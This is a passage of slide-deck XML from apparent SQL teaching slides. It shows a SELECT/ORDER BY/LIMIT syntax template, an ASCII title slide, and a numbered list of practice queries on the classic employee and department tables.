                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> column2, ...</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name WHERE someCol=SomeValue</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ORDER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column1, column2, ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ASC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DESC LIMIT offset,limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="3400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3046" name="Google Shape;3046;p494"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811475" y="4096450"/>
            <a:ext cx="5375700" cy="65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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.w3schools.com/sql/sql_top.asp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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0" name="Shape 3050"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3051" name="Google Shape;3051;p495"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="10570"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128150" y="716900"/>
            <a:ext cx="7349448" cy="4370900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3052" name="Google Shape;3052;p495"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567375" y="262000"/>
            <a:ext cx="8095800" cy="35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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>American Standard Code for Information Interchange</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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6" name="Shape 3056"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3057" name="Google Shape;3057;p496"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396150" y="72900"/>
            <a:ext cx="8046900" cy="4845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852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write the SQL queries for the following: -</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1150">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display the structure of the employee and dept data tables.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employee name, job and salary for all employees except managers.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employee name, depart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>ment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t> name and hiredate for those hired between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>January 1, 1982 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>January 1, 1983.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employee name, job and department number for all clerks and analysts.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employee name, job, department number and hire date for those whose name begins with capital letter 'A'.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employee name, job, department number and hire date for those whose name begins with capital letter 'J' followed by two characters and ending with 'SH'.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employee name, job,salary and comm for managers and salesmen earning comm 2000 or more.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>employee names,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t> job, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>salary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t> and for department no. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t> in descending salary order.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display the employee names of those whose names first letter is S.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display the employee names of those whose names last letter is S</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display the employee names of those whose names contain the letter S.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employee names and salaries for those having salaries less than their commission.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employees hired in 1981.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display the names and jobs of all employees in department no. 10 and 20.</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1150"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150"/>
              <a:t>Display employees who are not clerks or salesmen</a:t>
            </a:r>
            <a:endParaRPr sz="1150"/>
          </a:p>
        </p:txBody>
      </p:sp>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1" name="Shape 3061"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3062" name="Google Shape;3062;p497"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388025" y="205050"/>
            <a:ext cx="8514600" cy="4733400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Add a new column EMPADDRESS to Emp table.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the employee who was hired last. Display the employee who was hired fist.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1250" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>average </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>annual salary for all job types.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Display departments and total salary for departments with total salary exceeding 8000 excluding all the clerk. Order list by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1250" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>payroll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1250" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> amount.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display employee 'WARD' name and his department location.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the names and jobs of all employees with same department as JONES.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the employee name and department name for employee SMITH.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the hire dates for all employees in department 30 in the format given by the example Fourteen, JAN, 1999.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the employee name who was hired first.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Transfer employee 7788 to salesman position in department 30 and give him a 5% salary                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>  in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>crease.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Create a view containing employee number, name and calculated annual salary for department 10</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the employee names having the maximum salary in each department.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1250"/>
              <a:buAutoNum type="arabicPeriod" startAt="16"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250"/>
              <a:t>Display the employee names having the minimum salary in each department.</a:t>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3067" name="Google Shape;3067;p49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800"/>
              </a:spcBef>
              <a:spcAft>
